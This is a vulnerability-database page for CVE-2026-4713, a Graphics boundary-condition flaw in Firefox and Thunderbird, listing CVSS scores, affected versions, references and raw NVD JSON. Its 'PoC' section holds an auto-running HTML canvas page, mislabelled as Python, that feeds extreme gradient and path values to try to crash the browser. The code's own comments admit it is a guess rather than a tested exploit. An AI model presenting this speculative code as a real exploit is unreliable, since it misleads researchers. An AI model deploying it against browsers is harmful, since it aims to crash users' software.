CVE-2026-4713

Description

Incorrect boundary conditions in the Graphics component. This vulnerability was fixed in Firefox 149, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE

Mozilla Firefox < 149

Mozilla Firefox ESR < 140.9

Mozilla Thunderbird < 149

Mozilla Thunderbird < 140.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
  PoC for CVE-2026-4713
  Description: This script attempts to trigger the boundary condition issue in the Graphics component.
  Note: Actual exploitation requires specific payload tuning based on the vulnerable component version.
-->
<html>
<head>
    <title>CVE-2026-4713 Graphics Crash PoC</title>
</head>
<body>
    <h1>CVE-2026-4713 Proof of Concept</h1>
    <canvas id="exploitCanvas" width="800" height="600"></canvas>
    <script>
        function triggerVuln() {
            var canvas = document.getElementById('exploitCanvas');
            var ctx = canvas.getContext('2d', { alpha: false }); // Context settings

            // Attempt to manipulate graphics data to hit incorrect boundary conditions
            // This involves creating a path or gradient with extreme or malformed values
            try {
                // Create a linear gradient with manipulated coordinates
                // Vulnerability might be triggered by values exceeding expected integer boundaries
                var gradient = ctx.createLinearGradient(0, 0, 4294967295, 4294967295);
                gradient.addColorStop(0, 'rgba(255,0,0,1)');
                gradient.addColorStop(1, 'rgba(0,0,255,1)');

                ctx.fillStyle = gradient;
                ctx.fillRect(0, 0, 800, 600);

                // Alternative trigger: Drawing a massive path
                ctx.beginPath();
                ctx.moveTo(0, 0);
                ctx.lineTo(1.7976931348623157e+308, 1.7976931348623157e+308); // Max double value
                ctx.stroke();

                console.log("Render complete. If browser hangs or crashes, PoC successful.");
            } catch (e) {
                console.error("Exception occurred during render attempt:", e);
            }
        }

        // Execute automatically on load
        window.onload = triggerVuln;
    </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4713
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4713
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4713/
[4] VulDB https://vuldb.com/cve/CVE-2026-4713
[5] https://bugzilla.mozilla.org/show_bug.cgi?id=2018113
[6] https://www.mozilla.org/security/advisories/mfsa2026-20/
[7] https://www.mozilla.org/security/advisories/mfsa2026-22/
[8] https://www.mozilla.org/security/advisories/mfsa2026-23/
[9] https://www.mozilla.org/security/advisories/mfsa2026-24/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4713", "sourceIdentifier": "[email protected]", "published": "2026-03-24T13:16:07.217", "lastModified": "2026-04-13T15:17:42.720", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect boundary conditions in the Graphics component. This vulnerability was fixed in Firefox 149, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9."}, {"lang": "es", "value": "Condiciones de contorno incorrectas en el componente Gráficos. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 140.9, Thunderbird < 149, y Thunderbird < 140.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-754"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.9.0", "matchCriteriaId": "DA62D95E-CB01-4586-83DB-5094116FC939"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "149.0", "matchCriteriaId": "02F2B82F-E997-4D5F-BBB0-237E4962555B"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2018113", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-20/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-22/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-23/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-24/", "source": "[email protected]"}]}}